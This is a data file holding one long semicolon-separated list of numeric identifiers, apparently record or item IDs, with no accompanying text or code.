56498;104198;58022;109289;103482;62168;34019;83283;37923;65560;135110;119058;19137;56816;19138;19140;19139;121407;22912;127953;21518;80577;25427;25967;128589;157935;71239;25943;39408;72128;83389;21519;99497;88153;103442;138129;103483;91028;106996;100340;39376;58023;56499;85234;85730;73153;123645;87544;34189;19141;36298;103827;36377;80454;87388;34770;65852;79301;87228;65937;117442;61566;27601;89063;104733;142883;59104;128137;64923;61402;81534;143172;108704;81010;101784;95309;111224;55847;99193;22118;133245;21520;54825;51824;19142;108353;71452;125441;92833;88821;105363;57612;19143;85319;43847;49770;127827;105339;122140;19144;61388;25306;31378;59382;104266;31032;86591;94347;118706;19357;127552;121219;82893;148525;62422;99647;38728;90338;37850;68899;126806;25915;97811;92963;87791;77189;154926;21521;64859;87935;55397;95587;36878;121274;88504;62887;47131;123054;45348;49731;90608;59283;118707;21522;90291;158521;102988;62612;40396;70485;106859;40760;19145;51420;117724;25749;158073;93145;64875;48333;87615;93023;139113;104000;102691;95514;70241;90555;83442;21523;69293;27552;150218;135732;37706;106238;54952;143467;52563;33375;22105;135111;22241;91935;84530;159073;111480;80898;21524;36265;96620;71088;22520;139114;156022;133380;106216;21525;148865;86999;110934;86840;139716;91066;146616;45040;122413;19146;19147;38678;110431;67250;156764;107112;64693;66777;57355;135733;82894;91936;149013;56204;56528;109750;128440;89897;57704;95909;19148;54826;99259;86841;96164;92742;22490;151007;132429;49687;106738;51446;50337;50075;37040;96514;57740;112073;87000;70265;24799;81154;97690;56082;91937;122686;56500;30030;21526;92834;31156;134190;95515;96372;19149;77754;96743;62457;22350;70932;21527;54625;124790;66264;69219;140738;84011;36790;76364;87229;101829;91938;19150;96122;91939;111658;103828;95588;105260;106600;19358;128138;140630;86434;56523;93640;111020;88585;22491;127553;84328;73974;133537;43177;48334;93944;57463;91940;152491;103843;87752;136304;35910;157332;21528;19151;148840;31304;88731;122086;36433;129427;104985;152571;56478;21529;22006;23852;111409;89898;80455;119021;91949;126668;43038;19152;22343;158990;64422;86389;35771;57553;85925;95589;43095;139349;65853;85776;96223;103484;59551;144582;21530;73050;23853;121336;108739;84255;39320;58202;57911;67251;82631;42060;37275;19153;148140;102941;62208;86592;21679;62571;32070;119110;19154;118248;85429;100498;62807;45448;102725;19155;35428;131173;87001;127954;76630;19156;33493;19157;85833;119637;23761;129548;36450;101188;22141;56988;103844;50980;132352;128404;19158;57741;131296;22504;65624;47155;127554;56588;40979;19159;139935;157240;90556;61744;21531;34089;79079;86268;85485;19160;37043;147857;21532;140679;139557;56900;92713;19161;111142;25103;23953;104761;19162;62539;87514;137169;93024;84716;19163;72156;66341;148928;36232;140680;73975;111318;117443;147152;137692;61375;122291;36224;131149;153893;133973;85486;96062;56674;86860;19164;38763;29952;97251;76103;31184;63050;19165;21533;47601;25982;110466;85523;50815;35911;88745;91912;25018;84717;34840;21534;28351;139643;126082;90521;24826;19359;151407;137693;19166;34771;51966;90781;19168;19167;37101;51508;111410;29953;87616;85370;108626;21535;67194;145488;19169;148704;19170;151001;104367;97691;36385;82483;59700;59583;94084;141790;32071;111659;32350;69096;21536;154356;21537;94459;152668;85957;117305;97457;23954;84329;93073;63144;100365;100861;153825;64860;106612;153181;80039;57742;127555;63160;131109;135500;39496;32388;140739;26978;85562;33420;34508;59184;25207;127556;139717;104508;127557;58138;32128;45615;21538;72808;19171;94905;19172;21539;148514;19173;89049;89710;82064;22456;119512;124287;50338;35990;19174;22041;87515;97692;150308;19175;21540;97812;19176;29866;91583;64653;104564;149360;138583;19177;138200;81559;90292;33907;63379;54983;81901;92964;19178;21541;44661;129549;86181;153872;19179;89711;19180;102051;49167;90699;69546;27641;86593;138372;78730;26213;148527;119880;104509;21756;95394;51857;76780;132880;19181;149464;62553;119317;70777;72157;35286;80925;136942;117444;36897;89728;31327;103109;106960;93991;140238;118478;57705;29690;119795;100314;21542;19182;19183;87002;77837;108316;124210;152070;85246;37892;31833;145469;148702;97035;88154;34382;34310;21543;77235;38706;139740;144625;32470;156053;131297;36697;150408;85731;86842;73154;83799;38764;59749;157413;46767;149493;19184;130496;36760;25788;34247;22213;22492;43128;46338;66876;138130;96123;64668;130441;150105;69499;129840;36392;77401;55518;59828;19185;19186;144146;58024;37141;79958;111181;57883;30088;21544;123540;117445;22521;52987;19187;83390;32072;111092;137738;112074;29732;57743;89729;23854;38133;85320;31693;121220;157867;44602;28196;91913;88505;127558;51387;59750;76487;139832;152072;73322;92347;21545;28167;125750;131264;29691;83944;112198;22304;37817;14340;14280;99994;102917;104970;104971;119307;126754;125632;126647;128078;128415;17984;12613;12614;12617;15419;35700;149509;12014;20247;50510;50509;63223;77746;44873;49998;49997;58088;81182;66986;21580;63203;88696;88697;150427;24898;157327;10077;10078;10497;11923;10369;10699;21247;11455;10405;11311;11395;25402;20804;26193;31682;35088;38718;45528;52026;15931;52025;52024;76788;76786;12099;21644;20337;138853;20221;11160;11579;10080;10079;10082;10081;34324;10083;11565;101547;50811;10648;18367;11779;11614;11539;10084;10085;10086;10467;10692;10087;11566;10088;65078;10089;10488;14709;12080;12037;11392;10565;11391;10090;10653;53847;42149;11112;10929;19782;12056;36051;11045;11371;32373;32375;32374;10091;10821;19300;57272;10092;19303;11711;19520;19383;48351;48350;15479;25553;25548;48352;18302;58205;57793;57794;57889;11905;33546;22272;21017;65767;66294;66933;67171;12278;90255;65766;19512;20015;15624;11115;11876;12030;21019;16185;19419;21040;14338;11810;21018;12081;11211;10093;11998;10420;21339;19400;21168;150079;21245;34348;34488;20959;83465;11670;21619;21779;36143;21780;21036;18622;21324;36144;11037;14441;14442;14443;14444;14445;14446;14447;14448;14449;14450;14451;14452;14453;14454;14455;14456;14457;14458;14459;14460;14461;14462;14463;14464;14465;14466;14467;14468;14469;14470;14471;14472;14473;14475;14474;14476;14477;14479;14478;14481;14480;14482;14483;14484;14485;14486;14487;14488;14489;14490;14491;14492;14493;14494;14495;14496;14497;14498;14499;14500;14501;14503;14502;14505;14504;14506;14507;14508;14509;14510;14511;14512;14513;14514;14515;14516;14517;14518;14520;14519;14522;14521;14523;14524;14526;14525;14527;14528;14529;14530;14531;14532;14533;14534;14536;14535;14537;14538;14539;14540;14541;14542;14543;14544;14545;14546;14548;14547;14550;14549;14551;14552;14553;14554;14555;14556;14558;14557;14560;14559;14562;14561;14563;14564;14566;14565;14568;14567;14569;14570;14571;14572;14573;14574;14575;14576;14577;14578;14579;14580;14581;14582;14648;14583;14649;14650;14651;14652;14653;14662;14661;14666;14669;14675;14694;14677;14705;14710;14725;14746;14745;14747;14767;14766;14774;14779;14780;14781;14790;14791;14797;14798;14799;14809;14811;14821;15406;15407;15418;15424;15429;15431;15444;15445;15446;15447;15448;15472;15473;15476;15511;15512;15513;15526;15527;15538;15539;15545;15558;15559;15560;15567;15568;15579;15580;15581;15582;15587;15590;15606;15607;15610;15608;15612;15619;15634;15644;15645;15646;15647;15648;15649;15691;15692;15693;15694;15695;15696;15723;15724;15725;15754;15736;15768;15776;15777;15792;15818;15826;15833;15827;15837;15840;15843;15846;15903;15906;15921;15913;15922;15933;15954;15955;15969;15971;15989;15993;15997;16001;16002;16003;16004;16005;16006;16011;16010;16021;16034;16067;16066;16075;16068;16392;16393;16395;16394;16396;16397;16399;16398;16400;16401;16402;16403;16404;16405;16406;16407;16408;16409;16410;16411;16412;16413;16415;16414;16417;16416;16419;16418;16420;16421;16423;16422;16424;16425;16426;16427;16428;16429;16431;16430;16433;16432;16434;16435;16436;16437;16439;16438;16441;16440;16442;16443;16444;16445;16447;16446;16448;16449;16450;16451;16452;16453;16459;16458;16460;16471;17127;16472;17128;17138;17144;17145;17153;17164;17233;17206;17234;17235;17236;17248;17249;17250;17251;17261;17262;17263;17274;17275;17283;17276;17287;17284;17288;17317;17318;17319;17330;17344;17345;17353;17576;17580;17579;17581;17582;17615;17588;17616;17619;17620;17632;17642;17643;17665;17666;17667;17675;17676;17977;17992;17978;17993;18001;18013;18031;18043;18044;18045;18060;18061;18081;18088;18089;18102;18090;18116;18121;18126;18125;18127;18146;18144;18145;18159;18168;18169;18170;18228;18229;18230;18231;18232;18233;18234;18252;18269;18270;18271;18272;18338;18379;18380;18381;18382;18383;18384;18406;18425;18426;18427;18445;18448;18464;18465;18466;18468;18467;18481;18520;18529;18530;18531;18538;18544;18545;18547;18548;18549;18564;18590;18605;18606;18607;18633;18634;18647;18656;18666;18668;18669;18686;19199;19200;19210;19211;19212;19222;19231;19281;19282;19323;19324;19325;19326;19327;19328;19329;19330;19360;19361;19364;19366;19388;19389;19439;19440;19441;19442;19472;19484;19485;19533;19534;19535;19536;19537;19538;19572;19573;19574;19575;19576;19577;19578;19669;19670;19671;19686;19687;19741;19742;19810;19811;19812;19813;19814;19815;19816;19817;19818;19819;19820;19821;19822;19849;19974;19975;19976;19977;19978;19979;20030;20031;20032;20033;20034;20035;20036;20079;20080;20081;20102;20103;20115;20116;20117;20118;21275;20140;20142;20153;20154;20155;20156;20157;20195;20196;20197;20198;20233;20234;20235;20236;20244;20261;20262;20263;20264;20265;20266;20267;20281;20280;20313;20312;20314;20315;20327;20328;20330;20329;20352;20353;20355;20354;20356;20357;20371;20358;20411;20412;20413;20414;20415;20416;20418;20417;20419;20731;20798;20814;20815;20822;20823;20828;20829;20864;20873;20874;20894;20895;20896;20921;20934;20935;20938;20953;20962;20979;20980;20999;21000;21001;21021;21022;21044;21045;21046;21047;21048;21084;21085;21094;21095;21096;21097;21124;21125;21126;21127;21129;21128;21148;21147;21160;21166;21194;21195;21196;21197;21198;21199;21231;21254;21255;21256;21276;21277;21278;21279;21297;21298;21299;21315;21316;21317;21318;21347;21319;21348;21349;21350;21351;21352;21353;21354;21578;21355;21614;21579;21615;21663;21665;21664;21671;21666;21667;21680;21681;21702;21703;21704;21706;21705;21707;21708;21709;21710;21712;21711;21732;21734;21743;21742;21750;21758;21773;21759;21774;21775;21908;21791;22010;22009;22011;22012;22080;22083;22106;22107;22108;22119;22120;22142;22143;22144;22145;22146;22147;22148;22165;22166;22167;22168;22169;22171;22199;22200;22214;22215;22216;22217;22218;22242;22283;22284;22285;22286;22287;22288;22289;22290;22323;22324;22325;22326;22327;22351;22352;22353;22354;22355;22356;22429;22457;22458;22459;22460;22464;22469;22470;22471;22505;22506;22522;22890;22891;22892;22893;22894;22920;22913;22914;22915;22928;22929;22930;22939;23626;23668;23670;23669;23671;23672;23673;23674;23705;23675;23706;23707;23708;23709;23710;23725;23726;23727;23728;23729;23730;23745;23746;23747;23762;23795;23796;23855;23857;23856;23858;23859;23860;23861;23862;23863;23864;23865;23866;23867;23873;23874;23955;23956;23957;23958;23990;23991;23992;24008;24203;24205;24204;24206;24207;24209;24208;24249;24210;24250;24251;24252;24253;24254;24255;24256;24257;24258;24308;24309;24310;24311;24312;24313;24350;24351;24352;24353;24362;24367;24368;24369;24721;24722;24731;24732;24749;24750;24751;24772;24771;24773;24777;24800;24801;24802;24828;24829;24830;24839;24840;24841;24866;24867;24868;24869;24887;24888;24889;24929;24930;24931;24932;24933;24934;24935;24936;24937;24938;25019;25020;25053;25054;25055;25056;25057;25058;25059;25060;25104;25105;25106;25107;25108;25109;25110;25111;25131;25132;25133;25155;25154;25160;25184;25185;25186;25187;25188;25208;25209;25235;25236;25262;25288;25263;25340;25341;25361;25360;25382;25383;25384;25438;25452;25453;25474;25534;25561;25562;25593;25594;25641;25660;25661;25680;25665;25719;25789;25790;25791;25792;25793;25809;25808;25810;25866;25867;25869;25868;25870;25871;25872;25888;25873;25916;25917;25918;25920;25919;25921;25944;26040;26042;26041;26043;26094;26095;26097;26096;26098;26099;26100;26101;26102;26104;26103;26214;26117;26215;26216;26941;26943;26942;26945;26944;26946;26947;26980;26979;27045;27046;27047;27048;27049;27050;27051;27068;27517;27516;27553;27518;27554;27555;27556;27557;27558;27559;27579;27580;27592;27593;27611;27612;27613;27815;27823;27816;27824;27825;27826;27827;27847;27846;27848;28197;28198;28199;28217;28218;28219;28220;28260;28261;28263;28262;28264;28265;28266;28267;28318;28319;28320;28321;28322;28323;29231;29232;29290;29291;29292;29293;29294;29295;29296;29297;29716;29717;29733;29734;29812;29813;29814;29815;29816;29817;29818;29819;29820;29821;29905;29822;29907;29906;29908;29909;30031;29910;30032;30033;30089;30116;30117;30118;30119;30120;30128;30242;30135;30136;30137;30138;30139;30243;30244;31033;31083;31034;31084;31085;31157;31110;31158;31294;31295;31328;31329;31330;31380;31379;31381;31382;31383;31384;31385;31386;31387;31439;31440;31441;31442;31443;31444;31445;31446;31447;31593;31594;31611;31612;31613;31614;31634;31635;31636;31671;31672;31753;31752;31835;31834;31836;31837;31838;31955;31956;31957;31958;31959;31960;31961;31962;32009;32010;32011;32012;32014;32013;32015;32016;32017;32045;32046;32073;32074;32075;32111;32149;32150;32151;32152;32153;32208;32209;32210;32300;32301;32302;32303;32304;32351;32352;32353;32415;32417;32416;32450;32418;32491;32490;33084;33085;33118;33189;33202;33203;33243;33244;33246;33245;33265;33421;33422;33460;33461;33472;33473;33474;33494;33509;33556;33557;33558;33779;33780;33781;33782;33831;33832;33834;33833;33835;33836;33853;33854;33855;33858;33861;33891;34090;34091;34092;34093;34104;34105;34114;34248;34115;34251;34250;34259;34258;34272;34273;34297;34298;34299;34365;34678;34383;34733;34689;34734;34735;35018;34787;35019;35020;35021;35022;35023;35024;35059;35084;35085;35086;35100;35101;35102;35107;35108;35188;35189;35244;35257;35268;35269;35270;35271;35345;35346;35347;35348;35349;35350;35355;35356;35379;35380;35406;35432;35443;35367;35444;35614;35673;35674;35675;35731;35732;35791;35792;35793;35794;35795;35796;35797;35798;35799;35800;35809;35810;35811;35812;35813;35814;35815;35816;35817;35819;35818;35903;35904;35905;35912;35916;35917;35929;35942;35943;35954;35964;35969;35985;36002;36001;36013;36003;36027;36048;36055;36078;36085;36086;36092;36093;36094;36095;36096;36137;36138;36140;36139;36157;36158;36176;36195;36196;36197;36198;38161;38677;38883;38884;38885;38886;38887;38909;38920;38944;39561;39565;39571;39570;39595;39580;39614;39596;39776;39775;39778;39777;39780;39779;39781;39782;39848;39797;39868;39869;39870;40462;40463;40519;40520;40630;40631;40632;40633;40634;40635;40879;40880;40911;40912;40913;40914;40915;40916;40917;40918;40919;40959;40960;40961;40962;40963;40964;41022;41023;41637;42197;42214;42415;42239;42913;42834;42914;42915;42916;42968;43378;44890;44891;44892;44893;44894;44896;44895;44897;44898;44971;46768;46769;46770;46771;46772;46773;46774;46775;46776;46777;46778;46779;46793;46794;46804;46805;46806;46807;46808;46809;47016;49098;49115;49125;49124;49127;49636;49637;49732;49126;49771;50605;51349;51416;51532;51533;51534;51535;51536;51537;51657;51658;56425;56426;56445;56446;56458;56459;56460;56502;56501;56503;56524;56549;56589;56590;56504;56591;56593;56592;56594;56595;56625;56635;56626;56658;56660;56659;56686;56807;56808;56901;56724;56902;56903;56904;56906;56905;56908;56907;57433;57446;57456;57630;57631;57648;57649;57650;57651;57652;57653;57654;57655;57656;57721;57722;57723;57744;57745;58025;58081;58099;58100;58101;58102;58139;58174;58211;58175;58212;58213;58214;58216;58215;58217;58218;58219;58220;58221;58222;58378;58379;58380;58381;58382;59610;59612;59611;59613;59614;59615;59616;59617;59618;59620;59619;59622;59621;59624;59623;59625;59626;59627;59628;59629;59630;59632;59631;59633;59634;59645;59646;59647;59648;59650;59649;59651;59667;59668;59669;59670;59671;59672;59673;59674;59675;59676;59678;59677;59679;59701;59702;59703;59704;59680;59705;59706;59707;59708;59709;59894;59893;59895;59896;59897;59898;59899;59900;59901;59902;61540;61542;61541;61543;61544;61545;62235;62236;61783;62237;62286;62287;62288;62289;62300;62299;62302;62301;62342;62343;62345;62344;62359;62360;62362;62361;62363;62364;62379;62380;62631;62383;62632;62633;62634;62650;62651;62652;62867;63436;63437;63402;63438;63439;63440;63441;65862;67252;69438;69453;69464;69500;69454;69508;69538;69539;69547;69850;69861;69898;69889;69899;69900;70084;70085;69901;70109;70110;70111;70112;70129;70130;70131;70160;70161;70182;70184;70307;70308;70183;70309;70310;70311;70324;70380;70381;70382;70486;70487;70647;70648;70650;70649;70651;70673;70674;70675;70676;70677;70752;70778;70753;70835;70779;70836;70867;70868;70869;70959;70995;70996;70997;71073;71089;71090;71119;71120;71121;71122;71123;71124;71167;71168;71169;71170;71240;71258;71259;71286;71453;71454;71486;71487;71488;71628;71507;71762;71801;71809;71810;71812;71811;71906;71907;72016;72017;72032;72033;72051;72052;72053;72054;72071;72072;72073;72074;72075;72076;72077;72079;72078;74283;72080;72129;72130;72138;72158;72159;72207;72208;72254;72255;72256;72314;72139;72361;72383;72384;72385;72409;72411;72410;72413;72414;72418;72452;72453;72549;72613;72634;72633;72635;72636;72637;72638;72640;72639;72718;72755;72756;72851;72894;72996;72997;73127;73219;73220;73390;73391;73392;73393;73394;73406;73407;73849;73858;73859;73860;73861;73958;74051;74028;74052;74053;74054;74055;74056;74057;74058;74098;74060;74059;74061;74062;74064;74063;74065;74066;74067;74099;74234;74171;74258;74259;74319;74260;74320;74371;74372;74445;76061;76062;82003;76063;76064;76066;76065;82004;76084;76154;76178;76179;76180;76224;76225;76226;76270;76227;76272;76271;76273;76287;76288;76304;76305;76330;76331;76397;76434;76544;76303;76545;76864;76996;77110;77112;77190;77212;77213;77234;77452;77453;77454;77456;77455;77457;77458;77459;77460;77461;77462;77470;77467;77512;77471;77773;77548;77774;77775;77776;78059;77886;78060;78384;78879;78880;78881;79266;79080;79415;79404;79416;79417;79609;79418;79811;79812;79813;79814;79844;79959;79960;79961;79963;79962;79964;79965;79966;79967;79968;79969;79970;79971;79972;79973;79974;79975;79976;79977;79978;79979;79980;79981;79982;80109;80040;80209;80210;80239;80240;80241;80242;80243;80244;80262;80245;80264;80263;80265;80266;80267;80268;80269;80270;80271;80272;80273;80328;81224;81225;81226;81227;81228;81229;81230;81231;81232;81368;81369;81396;81370;81535;81686;81536;81688;81687;81690;81689;82006;82005;82007;82008;82009;82010;82011;82314;82732;82632;82733;82734;82735;84071;83443;83911;83912;84072;84315;84330;84331;84531;84332;84556;84602;84603;84604;84605;84606;84607;84654;86081;86082;84718;84719;86084;86083;86085;86086;86087;86088;84935;84863;84974;86089;85430;85431;86132;86133;86134;86135;86136;86137;86435;91735;86687;86688;86690;86689;86691;86692;86693;86701;87484;87485;87516;86908;87545;87546;87706;87707;87708;87709;87710;87711;87712;87713;88391;87985;88393;88392;88586;88587;103586;88822;89713;89712;89809;89810;89811;89899;89901;89900;89903;89902;89905;89906;89904;90053;90339;89907;90340;90380;90743;90744;90849;91176;91376;91378;91377;91478;91379;91479;91480;91481;91638;103587;91701;91703;91704;91702;91842;91844;91843;91845;91846;91847;91862;91864;91863;91983;91982;92348;92042;92350;92349;92351;92478;92479;92480;92482;92481;92483;92484;92486;92485;92653;92852;93698;93697;93902;93903;93945;93946;93992;93993;94085;93994;94420;94422;94460;94421;94461;94594;94595;94889;94890;94891;94892;94893;94936;95018;95019;95020;95021;95266;95267;95268;95269;95270;95271;95420;95421;95516;95517;95518;95519;95520;95521;95522;95523;95524;95525;95526;95527;95528;95547;95548;95602;95603;95604;95605;95636;95637;95638;95639;95640;95641;95642;95696;95695;95697;95698;95699;95735;95736;95737;95738;95739;95740;95741;95742;95743;95815;95817;95816;96124;96125;96126;96127;96128;96224;96225;96226;96227;96228;96229;96230;96231;96232;96233;96234;96235;96236;96237;96238;96239;96240;96242;96241;96244;96243;96245;96276;96373;96398;96399;96413;96414;96415;96416;96417;96418;96419;96420;96421;96422;96423;96424;96425;96474;96426;96475;96515;96516;96541;96543;96542;96544;96575;96576;96640;96641;96642;96643;96644;96683;96684;96686;96685;96687;96688;96689;96690;96710;96691;96744;96745;96747;96746;96749;96748;96786;96787;96853;96852;96854;96855;96856;96857;96858;96859;96860;96914;96861;96916;96915;96996;97092;97111;97110;97112;97183;97184;97252;97253;97254;97255;97256;97257;97258;97259;97260;97261;97262;97263;97265;97264;97267;97266;97268;97269;97270;97271;97272;97273;97343;97344;97813;97814;97815;99011;99012;99013;99014;99274;99275;99276;100015;99699;100016;100017;100018;100082;100083;100084;100085;100262;100263;100443;100444;100445;100446;100523;100628;100629;100630;100647;100648;100649;100650;100651;100652;100653;100654;100655;100656;100657;100942;100675;100943;100944;100945;100946;101016;101017;101018;101019;101020;101021;101073;101074;101075;101333;101248;101334;101335;101336;101337;101338;101339;101340;101342;101341;101343;101344;101345;101924;102531;102532;102616;102617;102618;102619;102620;102798;102799;102942;103271;103270;103272;103273;103274;103275;103276;103277;103278;103279;103280;103282;103281;103443;103444;103446;103445;103447;103448;103449;103450;103463;103462;103464;103485;103486;103719;103720;103721;103722;103723;103725;103724;103727;103726;103846;103845;103847;103848;103849;103850;103851;103910;103911;103912;103913;104064;104066;104067;104068;104065;104069;104070;104229;104231;104230;104232;104233;104510;104492;104512;104511;104513;104514;104515;104516;104517;104518;104519;104520;104694;104695;104697;105261;105262;104696;105263;105264;105627;105628;105629;105630;105631;105632;105634;105633;105635;105755;105756;105666;105757;106038;106039;106087;106116;106117;106428;106429;106739;106883;106884;106885;106886;106887;107178;107200;107201;107284;108432;108317;108433;108434;108435;108525;108526;108627;108628;108820;108821;108822;108924;108925;108926;108927;108928;108929;108930;108931;109007;109056;109097;109098;109099;109230;109231;109232;109233;109234;109235;109290;109533;109534;109535;109627;109806;109930;109974;109975;109976;110174;110175;110176;110212;110255;110256;110522;110524;110523;110525;110614;110615;110616;110677;110676;111143;111225;111412;111411;112075;112076;112077;112078;117967;117968;117969;117894;118505;118507;118506;118509;118508;118510;118845;118846;118847;118848;124211;124212;124213;124214;124215;119131;119130;119133;119132;119134;119160;119161;119162;119164;119163;119165;119275;119276;119319;119318;119320;119321;119322;119323;119483;119703;119702;119704;119852;119944;119945;122729;122730;122731;122732;122733;122734;122735;122831;122736;122833;122832;122835;122834;122836;122937;122990;123423;123424;123425;123426;123427;123428;123429;123575;123576;123577;123578;123579;123580;123582;123581;123696;123842;123983;123984;123985;124070;124071;124072;124130;124131;124132;124225;124226;124227;124228;124288;124289;127559;127560;127561;125751;127562;127563;127955;127956;127957;127958;127959;127960;127961;127962;127963;127964;127965;127966;127968;127967;127969;127970;127971;127972;127974;127973;128441;128442;128443;128444;128590;128591;128592;128593;128595;128594;128596;128597;130329;130633;130634;130635;130636;131265;131266;131268;131267;134468;134469;134470;134471;134472;134473;134474;134586;134475;134587;134588;134589;134590;134591;134592;134593;134594;134595;134596;134597;134598;134599;134600;134601;134602;134603;134604;134605;134606;134608;134607;134610;134609;134641;134640;134642;134643;134724;134725;134726;134727;134728;134730;134731;134732;134729;134776;134924;134925;134775;134926;134927;134928;134929;134930;134964;134965;134966;134967;134968;134969;135017;135018;135019;135020;135021;135112;135114;135113;135115;135116;135195;135216;135426;135427;135946;135947;135948;135949;136214;136213;136216;136215;136538;136539;136540;136541;136542;136636;136637;136638;136639;136640;136642;136641;137288;136643;137440;137383;137441;137442;137444;137443;137446;137445;137447;137448;137449;137450;137451;137452;137453;137454;137455;137456;137457;137458;137459;137460;138924;138925;138926;138927;138928;138929;138930;138931;138932;138933;138934;138935;138936;138937;138938;138939;138940;138941;138942;138943;138944;138945;138946;138947;138948;138949;138950;138951;138952;138953;138955;138954;138956;138957;138958;138959;138960;138961;138963;138962;138964;138965;138966;138968;138967;138969;138970;138971;138972;138973;138974;139115;139116;139118;139117;139119;139120;139122;139121;139123;139269;139270;139271;139272;139273;139274;139437;139438;139439;139440;139441;139718;139833;139834;139887;139888;139889;139890;139891;139892;139937;139936;140067;140068;140069;140070;140071;140072;140315;140316;140474;140559;140560;140561;140562;140563;140564;140565;140566;140567;141063;141064;141065;141066;141067;141068;141505;141531;141735;141669;141701;141732;141837;142010;142325;142250;142239;142272;142241;142854;142848;142843;142834;142826;142833;142850;142846;142844;142923;142933;142930;142939;142932;143524;143491;143494;143531;143493;143495;143528;143503;144597;144590;144603;144591;144598;144592;144593;144602;144588;144601;144600;144589;150006;144610;144614;144821;144817;144820;144607;144832;144865;144833;144864;144867;144922;144923;145256;145341;145380;145327;145378;145296;145282;145321;145303;145333;145369;145425;145432;145428;145426;145424;145429;145433;145436;145430;145473;145489;145477;145524;145526;145561;145566;145564;145711;145758;148268;148273;148267;148271;149221;149216;149222;149220;149228;149217;149215;149223;149226;149233;149277;150016;150011;150007;150000;150025;150022;150001;150013;150020;150023;150009;150004;150021;157035;156966;156996;156979;157007;156978;156999;156990;156991;156993;157011;157029;156994;157000;157036;157038;157032;156977;157026;157010;157020;157003;157043;157009;156987;157012;157042;157028;157018;156968;156995;156984;157005;157041;156970;157030;157037;156971;157021;156974;157017;157015;156997;157014;156975;157006;156998;156967;157002;157031;157024;157033;157008;156988;157004;157019;156973;156992;156969;156976;157001;156980;156972;156985;156986;157022;157027;157016;157034;156983;156982;157025;157023;157039;156989;154715;154716;157040;156981;157013;157140;157266;157241;158198;34312;24017;18220;159007;20738;20736;24746;26927;19314;42963;25338;16225;42964;100356;34399;109405;117459;119240;117596;125631;130273;139748;35468;10094;65822;80306;102494;110270;100357;80305;65702;105374;105375;80202;154879;80201;158560;158888;152483;158891;158889;158890;152484;51370;44675;53336;110612;110192;39330;128523;55929;58846;66804;82902;90681;99522;80949;88022;96624;76591;84810;70482;86481;103962;119559;58089;57803;58090;57804;57805;77556;92462;94160;92463;92464;94161;38701;55930;55931;91715;53876;17245;10095;45405;12288;21188;18627;155737;66964;10408;11736;11893;18371;19605;15975;20110;31420;10946;11716;20177;20178;20179;66963;82566;105389;157066;102174;157069;157068;20344;18615;21325;157067;100620;18194;10690;19384;100621;18433;40668;34197;34742;52589;52657;77761;52975;53569;53879;54647;55460;54989;55765;55959;56023;56125;56230;56241;56391;56650;56779;56920;57468;57288;57666;57876;57974;58206;58328;58342;58434;58536;58644;58954;59117;59255;35558;35689;39449;38154;38699;38791;59735;59958;61381;61462;61774;62518;62313;62519;62861;63063;63110;63232;63645;63468;65029;65097;65691;64813;66930;66813;67232;66556;69423;69139;39356;39492;39852;40778;70494;70273;70916;70923;71227;72167;71968;72616;72800;72939;73082;73419;73710;74008;74122;74434;76581;77184;77581;77861;77409;78475;78080;79141;79336;79578;79836;80485;41958;41000;42413;42798;81207;80951;81020;82534;81647;83136;83366;82825;84049;84342;84731;83745;85567;84667;84921;86209;85743;86380;86061;86852;87417;87206;86598;87245;88681;88956;88088;90194;89786;89685;44317;44587;45086;45610;46171;90542;90794;91716;91350;91128;91455;92791;92628;93476;93817;94136;94580;94676;95480;96828;99136;97724;99633;99995;100991;100679;47859;48383;46732;46850;47139;93315;47595;103421;101980;103648;102993;104434;103933;106350;105356;105152;106485;106682;106840;107220;109395;109899;110228;111383;117636;117429;117333;49237;49089;49285;118887;119097;118153;119558;119684;121514;122617;122246;131738;122853;124279;125371;124460;126753;125729;125952;127129;128328;127120;129848;128741;129054;131190;130275;130463;131022;132717;133053;131954;132097;50476;133848;50049;133954;134215;134701;135094;133465;135704;135917;136122;136348;135401;137635;137701;136743;137081;139001;139459;139695;140406;138449;140700;139794;141573;142209;142641;142719;144781;141194;142971;143471;146204;146060;146544;145071;148243;148487;146948;147754;51161;50977;51511;149412;148558;148848;148996;150430;150854;149900;151672;152189;151831;152928;152609;153255;153515;153630;153829;153931;154238;154706;155352;155867;156033;156462;156862;158051;157293;158500;52501;51872;158936;51921;53392;65723;42895;34196;42894;24710;24709;66272;136192;66271;45049;55734;52980;65925;71897;45048;20228;26196;20241;19767;56980;56713;66925;62315;56712;136193;66926;17656;15717;16195;16194;14237;15451;19234;19235;122114;119776;119777;124240;123419;123013;16265;20159;72757;123520;103513;103514;123796;119775;124173;123464;123463;81259;81260;103515;56819;66718;66719;33761;19752;16120;81258;18355;49977;66325;67020;67019;67018;67017;62412;16183;64471;77665;69477;58402;22003;25769;58401;58513;50689;50690;51815;50692;56385;62284;62283;50691;38971;38972;56634;62391;16175;35725;33141;10097;93028;85182;50695;56407;62416;86609;50693;50694;25084;62415;35726;59968;60047;38927;19228;16174;59734;59733;11500;11501;10099;10471;11436;15851;20248;19942;19943;27620;28293;11363;81703;158252;15517;12243;50304;55975;50305;117615;117616;12117;77115;77114;147193;22497;77113;10100;11602;59797;59798;14370;111351;67022;67023;67024;21306;25898;20223;18296;50307;50306;35360;35359;12210;10731;11642;24876;25950;40350;45543;58724;11913;35555;26015;16060;15927;26016;69033;69034;69032;69040;69039;69036;69038;69035;69037;78429;107056;33902;44318;19307;22181;22180;19501;10101;101111;107057;16162;20171;15604;18132;21164;15605;49119;35554;101112;22899;22900;61448;18133;61449;18135;18134;18136;24817;17650;58010;11617;18137;18138;11646;21081;22004;104410;87413;96797;87415;11745;19255;19755;21736;87414;18363;31191;19254;22902;19194;18400;17308;117886;21745;73980;110695;11979;12089;90313;76283;76284;72177;82849;72175;72178;52979;52978;56165;55552;55551;58387;22225;53641;58399;58398;49645;38792;90941;72176;90796;102431;66969;66849;71806;83030;19601;55550;76616;57862;43635;53857;58526;58527;67121;64475;44330;62204;39617;39616;124086;79233;121349;141251;141208;64474;64473;141362;58185;29725;65255;71889;76620;103787;99030;100868;102500;103788;103696;119501;71890;71891;76621;99729;99728;118038;133605;93079;118040;100870;125736;54999;71892;54998;99360;63265;65256;71886;71887;71888;55577;71885;55906;76463;55907;59055;55749;55748;47780;47779;25655;11520;93097;100869;76462;54628;12120;54627;11396;36128;152164;36129;69480;70453;78110;71499;78870;89938;104812;63523;65617;66358;69281;69282;69283;73806;64631;64632;73461;59718;70806;77054;97888;83815;91571;83993;85767;97552;62902;91972;91973;69424;83489;59717;69399;96270;51812;87211;57700;57699;66273;46676;57701;56651;52614;46675;70099;70101;70100;83036;90196;93844;95658;100159;109914;90197;58516;42879;101296;58515;101297;70147;79798;79799;79800;79801;77730;94933;70146;79802;78111;70145;89939;104813;74269;